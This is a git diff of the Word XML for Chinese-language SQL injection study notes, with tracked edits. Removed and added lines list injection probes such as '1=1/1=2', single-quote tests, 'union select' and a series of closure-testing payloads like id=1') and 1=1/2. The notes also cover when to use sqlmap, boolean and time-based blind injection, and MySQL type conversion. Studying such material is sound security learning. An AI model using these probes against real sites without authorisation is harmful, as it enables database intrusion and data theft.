--- a/2.sql injection/sql注入笔记.docx
+++ b/2.sql injection/sql注入笔记.docx
@@ -84,65 +84,70 @@
           <w:numId w:val="2"/>
         </w:numPr>
         <w:ind w:firstLineChars="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>1=1</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>和</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>1=2</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>返回不同说明存在注入漏洞</w:t>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>//</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>盲注</w:t>
-      </w:r>
-      <w:r>
-        <w:t>测试</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>，</w:t>
-      </w:r>
-      <w:r>
-        <w:t>针对</w:t>
-      </w:r>
-      <w:r>
-        <w:t>’</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>过滤</w:t>
-      </w:r>
+        <w:rPr>
+          <w:del w:id="0" w:author="rj f" w:date="2017-06-20T11:55:00Z"/>
+        </w:rPr>
+      </w:pPr>
+      <w:del w:id="1" w:author="rj f" w:date="2017-06-20T11:55:00Z">
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:delText>1=1</w:delText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:delText>和</w:delText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:delText>1=2</w:delText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:delText>返回不同说明存在注入漏洞</w:delText>
+        </w:r>
+        <w:r>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:tab/>
+          <w:delText>//</w:delText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:delText>盲注</w:delText>
+        </w:r>
+        <w:r>
+          <w:delText>测试</w:delText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:delText>，</w:delText>
+        </w:r>
+        <w:r>
+          <w:delText>针对</w:delText>
+        </w:r>
+        <w:r>
+          <w:delText>’</w:delText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:delText>过滤</w:delText>
+        </w:r>
+      </w:del>
     </w:p>
     <w:p>
       <w:pPr>
@@ -152,61 +157,66 @@
           <w:numId w:val="2"/>
         </w:numPr>
         <w:ind w:firstLineChars="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>单引号</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>'</w:t>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>//</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>基本</w:t>
-      </w:r>
-      <w:r>
-        <w:t>注入测试</w:t>
-      </w:r>
+        <w:rPr>
+          <w:del w:id="2" w:author="rj f" w:date="2017-06-20T11:55:00Z"/>
+        </w:rPr>
+      </w:pPr>
+      <w:del w:id="3" w:author="rj f" w:date="2017-06-20T11:55:00Z">
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:delText>单引号</w:delText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:delText>'</w:delText>
+        </w:r>
+        <w:r>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:delText>//</w:delText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:delText>基本</w:delText>
+        </w:r>
+        <w:r>
+          <w:delText>注入测试</w:delText>
+        </w:r>
+      </w:del>
     </w:p>
     <w:p>
       <w:pPr>
@@ -216,62 +226,67 @@
           <w:numId w:val="2"/>
         </w:numPr>
         <w:ind w:firstLineChars="0"/>
-      </w:pPr>
-      <w:r>
-        <w:t>U</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">nion </w:t>
-      </w:r>
-      <w:r>
-        <w:t>select</w:t>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>//</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>联合</w:t>
-      </w:r>
-      <w:r>
-        <w:t>查询注入测试</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>，</w:t>
-      </w:r>
-      <w:r>
-        <w:t>针对</w:t>
-      </w:r>
-      <w:r>
-        <w:t>and</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>关键字过滤</w:t>
-      </w:r>
+        <w:rPr>
+          <w:del w:id="4" w:author="rj f" w:date="2017-06-20T11:55:00Z"/>
+        </w:rPr>
+      </w:pPr>
+      <w:del w:id="5" w:author="rj f" w:date="2017-06-20T11:55:00Z">
+        <w:r>
+          <w:delText>U</w:delText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:delText xml:space="preserve">nion </w:delText>
+        </w:r>
+        <w:r>
+          <w:delText>select</w:delText>
+        </w:r>
+        <w:r>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:tab/>
+        </w:r>
+        <w:r>
+          <w:tab/>
+          <w:delText>//</w:delText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:delText>联合</w:delText>
+        </w:r>
+        <w:r>
+          <w:delText>查询注入测试</w:delText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:delText>，</w:delText>
+        </w:r>
+        <w:r>
+          <w:delText>针对</w:delText>
+        </w:r>
+        <w:r>
+          <w:delText>and</w:delText>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:delText>关键字过滤</w:delText>
+        </w:r>
+      </w:del>
     </w:p>
     <w:p>
       <w:pPr>
@@ -281,6 +296,508 @@
           <w:numId w:val="2"/>
         </w:numPr>
         <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:ins w:id="6" w:author="rj f" w:date="2017-06-20T11:56:00Z"/>
+        </w:rPr>
+      </w:pPr>
+      <w:ins w:id="7" w:author="rj f" w:date="2017-06-20T11:55:00Z">
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:t>单引号是否</w:t>
+        </w:r>
+      </w:ins>
+      <w:ins w:id="8" w:author="rj f" w:date="2017-06-20T11:56:00Z">
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:t>报错确认可能的注入点；</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:t xml:space="preserve">-- </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:t>一般如果这一步确认了就可以直接用</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:t>sqlmap</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:t>跑了，</w:t>
+        </w:r>
+      </w:ins>
+      <w:ins w:id="9" w:author="rj f" w:date="2017-06-20T11:57:00Z">
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:t>如果</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:t>sqlmap</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:t>跑不出来再尝试手工</w:t>
+        </w:r>
+      </w:ins>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:ins w:id="10" w:author="rj f" w:date="2017-06-20T11:57:00Z"/>
+        </w:rPr>
+      </w:pPr>
+      <w:ins w:id="11" w:author="rj f" w:date="2017-06-20T11:57:00Z">
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:t>利用</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:t>bool (blind)</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:t>注入测试，确认</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:t>SQL</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:t>的闭合类型；</w:t>
+        </w:r>
+      </w:ins>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="40"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:ins w:id="12" w:author="rj f" w:date="2017-06-20T11:58:00Z"/>
+        </w:rPr>
+        <w:pPrChange w:id="13" w:author="rj f" w:date="2017-06-20T11:57:00Z">
+          <w:pPr>
+            <w:pStyle w:val="a3"/>
+            <w:numPr>
+              <w:numId w:val="2"/>
+            </w:numPr>
+            <w:ind w:left="840" w:firstLineChars="0" w:hanging="420"/>
+          </w:pPr>
+        </w:pPrChange>
+      </w:pPr>
+      <w:ins w:id="14" w:author="rj f" w:date="2017-06-20T11:58:00Z">
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:t>i</w:t>
+        </w:r>
+        <w:r>
+          <w:t>d=1 and 1=1/2</w:t>
+        </w:r>
+      </w:ins>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="40"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:ins w:id="15" w:author="rj f" w:date="2017-06-20T11:58:00Z"/>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:pPrChange w:id="16" w:author="rj f" w:date="2017-06-20T11:58:00Z">
+          <w:pPr>
+            <w:pStyle w:val="a3"/>
+            <w:numPr>
+              <w:numId w:val="2"/>
+            </w:numPr>
+            <w:ind w:left="840" w:firstLineChars="0" w:hanging="420"/>
+          </w:pPr>
+        </w:pPrChange>
+      </w:pPr>
+      <w:ins w:id="17" w:author="rj f" w:date="2017-06-20T11:58:00Z">
+        <w:r>
+          <w:t>id=1)</w:t>
+        </w:r>
+        <w:r>
+          <w:t xml:space="preserve"> and 1=1/2</w:t>
+        </w:r>
+      </w:ins>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="40"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:ins w:id="18" w:author="rj f" w:date="2017-06-20T11:58:00Z"/>
+        </w:rPr>
+        <w:pPrChange w:id="19" w:author="rj f" w:date="2017-06-20T11:57:00Z">
+          <w:pPr>
+            <w:pStyle w:val="a3"/>
+            <w:numPr>
+              <w:numId w:val="2"/>
+            </w:numPr>
+            <w:ind w:left="840" w:firstLineChars="0" w:hanging="420"/>
+          </w:pPr>
+        </w:pPrChange>
+      </w:pPr>
+      <w:ins w:id="20" w:author="rj f" w:date="2017-06-20T11:58:00Z">
+        <w:r>
+          <w:t>id=1))</w:t>
+        </w:r>
+        <w:r>
+          <w:t xml:space="preserve"> and 1=1/2</w:t>
+        </w:r>
+      </w:ins>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="40"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:ins w:id="21" w:author="rj f" w:date="2017-06-20T11:58:00Z"/>
+        </w:rPr>
+        <w:pPrChange w:id="22" w:author="rj f" w:date="2017-06-20T11:57:00Z">
+          <w:pPr>
+            <w:pStyle w:val="a3"/>
+            <w:numPr>
+              <w:numId w:val="2"/>
+            </w:numPr>
+            <w:ind w:left="840" w:firstLineChars="0" w:hanging="420"/>
+          </w:pPr>
+        </w:pPrChange>
+      </w:pPr>
+      <w:ins w:id="23" w:author="rj f" w:date="2017-06-20T11:58:00Z">
+        <w:r>
+          <w:t>id=1’</w:t>
+        </w:r>
+        <w:r>
+          <w:t xml:space="preserve"> and 1=1/2</w:t>
+        </w:r>
+      </w:ins>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="40"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:ins w:id="24" w:author="rj f" w:date="2017-06-20T11:58:00Z"/>
+        </w:rPr>
+        <w:pPrChange w:id="25" w:author="rj f" w:date="2017-06-20T11:57:00Z">
+          <w:pPr>
+            <w:pStyle w:val="a3"/>
+            <w:numPr>
+              <w:numId w:val="2"/>
+            </w:numPr>
+            <w:ind w:left="840" w:firstLineChars="0" w:hanging="420"/>
+          </w:pPr>
+        </w:pPrChange>
+      </w:pPr>
+      <w:ins w:id="26" w:author="rj f" w:date="2017-06-20T11:58:00Z">
+        <w:r>
+          <w:t>id=1’)</w:t>
+        </w:r>
+        <w:r>
+          <w:t xml:space="preserve"> and 1=1/2</w:t>
+        </w:r>
+      </w:ins>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="40"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:ins w:id="27" w:author="rj f" w:date="2017-06-20T11:58:00Z"/>
+        </w:rPr>
+        <w:pPrChange w:id="28" w:author="rj f" w:date="2017-06-20T11:57:00Z">
+          <w:pPr>
+            <w:pStyle w:val="a3"/>
+            <w:numPr>
+              <w:numId w:val="2"/>
+            </w:numPr>
+            <w:ind w:left="840" w:firstLineChars="0" w:hanging="420"/>
+          </w:pPr>
+        </w:pPrChange>
+      </w:pPr>
+      <w:ins w:id="29" w:author="rj f" w:date="2017-06-20T11:58:00Z">
+        <w:r>
+          <w:t>id=1’))</w:t>
+        </w:r>
+        <w:r>
+          <w:t xml:space="preserve"> and 1=1/2</w:t>
+        </w:r>
+      </w:ins>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="40"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:ins w:id="30" w:author="rj f" w:date="2017-06-20T11:58:00Z"/>
+        </w:rPr>
+        <w:pPrChange w:id="31" w:author="rj f" w:date="2017-06-20T11:57:00Z">
+          <w:pPr>
+            <w:pStyle w:val="a3"/>
+            <w:numPr>
+              <w:numId w:val="2"/>
+            </w:numPr>
+            <w:ind w:left="840" w:firstLineChars="0" w:hanging="420"/>
+          </w:pPr>
+        </w:pPrChange>
+      </w:pPr>
+      <w:ins w:id="32" w:author="rj f" w:date="2017-06-20T11:58:00Z">
+        <w:r>
+          <w:t>id=1”</w:t>
+        </w:r>
+        <w:r>
+          <w:t xml:space="preserve"> and 1=1/2</w:t>
+        </w:r>
+      </w:ins>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="40"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:ins w:id="33" w:author="rj f" w:date="2017-06-20T11:58:00Z"/>
+        </w:rPr>
+        <w:pPrChange w:id="34" w:author="rj f" w:date="2017-06-20T11:57:00Z">
+          <w:pPr>
+            <w:pStyle w:val="a3"/>
+            <w:numPr>
+              <w:numId w:val="2"/>
+            </w:numPr>
+            <w:ind w:left="840" w:firstLineChars="0" w:hanging="420"/>
+          </w:pPr>
+        </w:pPrChange>
+      </w:pPr>
+      <w:ins w:id="35" w:author="rj f" w:date="2017-06-20T11:58:00Z">
+        <w:r>
+          <w:t>id=1”)</w:t>
+        </w:r>
+        <w:r>
+          <w:t xml:space="preserve"> and 1=1/2</w:t>
+        </w:r>
+      </w:ins>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="40"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:ins w:id="36" w:author="rj f" w:date="2017-06-20T11:59:00Z"/>
+        </w:rPr>
+        <w:pPrChange w:id="37" w:author="rj f" w:date="2017-06-20T11:57:00Z">
+          <w:pPr>
+            <w:pStyle w:val="a3"/>
+            <w:numPr>
+              <w:numId w:val="2"/>
+            </w:numPr>
+            <w:ind w:left="840" w:firstLineChars="0" w:hanging="420"/>
+          </w:pPr>
+        </w:pPrChange>
+      </w:pPr>
+      <w:ins w:id="38" w:author="rj f" w:date="2017-06-20T11:58:00Z">
+        <w:r>
+          <w:t>id=1”))</w:t>
+        </w:r>
+        <w:r>
+          <w:t xml:space="preserve"> and 1=1/2</w:t>
+        </w:r>
+      </w:ins>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:ins w:id="39" w:author="rj f" w:date="2017-06-20T12:00:00Z"/>
+        </w:rPr>
+        <w:pPrChange w:id="40" w:author="rj f" w:date="2017-06-20T11:59:00Z">
+          <w:pPr>
+            <w:pStyle w:val="a3"/>
+            <w:numPr>
+              <w:numId w:val="2"/>
+            </w:numPr>
+            <w:ind w:left="840" w:firstLineChars="0" w:hanging="420"/>
+          </w:pPr>
+        </w:pPrChange>
+      </w:pPr>
+      <w:ins w:id="41" w:author="rj f" w:date="2017-06-20T11:59:00Z">
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:t>根据是否有正确</w:t>
+        </w:r>
+      </w:ins>
+      <w:ins w:id="42" w:author="rj f" w:date="2017-06-20T12:00:00Z">
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:t>/</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:t>错误的反馈，选择合适的手工注入方式。</w:t>
+        </w:r>
+      </w:ins>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
+        <w:rPr>
+          <w:ins w:id="43" w:author="rj f" w:date="2017-06-20T11:55:00Z"/>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:ins w:id="44" w:author="rj f" w:date="2017-06-20T12:00:00Z">
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:t>没有任何正确</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:t>/</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:t>错误的反馈，选择</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:t>time (blind)</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:t>注入</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:t>，需要</w:t>
+        </w:r>
+      </w:ins>
+      <w:ins w:id="45" w:author="rj f" w:date="2017-06-20T12:01:00Z">
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:t>尝试步骤</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:t>2</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rFonts w:hint="eastAsia"/>
+          </w:rPr>
+          <w:t>中的所有情况。</w:t>
+        </w:r>
+      </w:ins>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="2"/>
+        </w:numPr>
+        <w:ind w:firstLineChars="0"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">GET/POST </w:t>
@@ -618,7 +1135,15 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>1234</w:t>
+        <w:t>12</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="46" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="46"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>34</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -739,6 +1264,21 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>MYSQL</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>类型转换</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
         </w:rPr>
         <w:t>解释</w:t>
       </w:r>
@@ -761,7 +1301,130 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>中，使用“</w:t>
+        <w:t>中</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>同时操作字符串和</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>时</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>mysql</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>会尝试将</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>v</w:t>
+      </w:r>
+      <w:r>
+        <w:t>archar</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>转换为数字类型（</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>取</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>varchar</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>最前面的数字作为</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>的值</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>如果没有，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>就当做数字</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>处理）。如’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>1abc</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>’</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -773,7 +1436,19 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>”进行字符连接时，</w:t>
+        <w:t>’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>22</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>′，</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -785,7 +1460,55 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>会尝试将字段值转换为数字类型（如果转换失败，就当做数字</w:t>
+        <w:t>将“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>1abc</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>”转成数字</w:t>
+      </w:r>
+      <w:r>
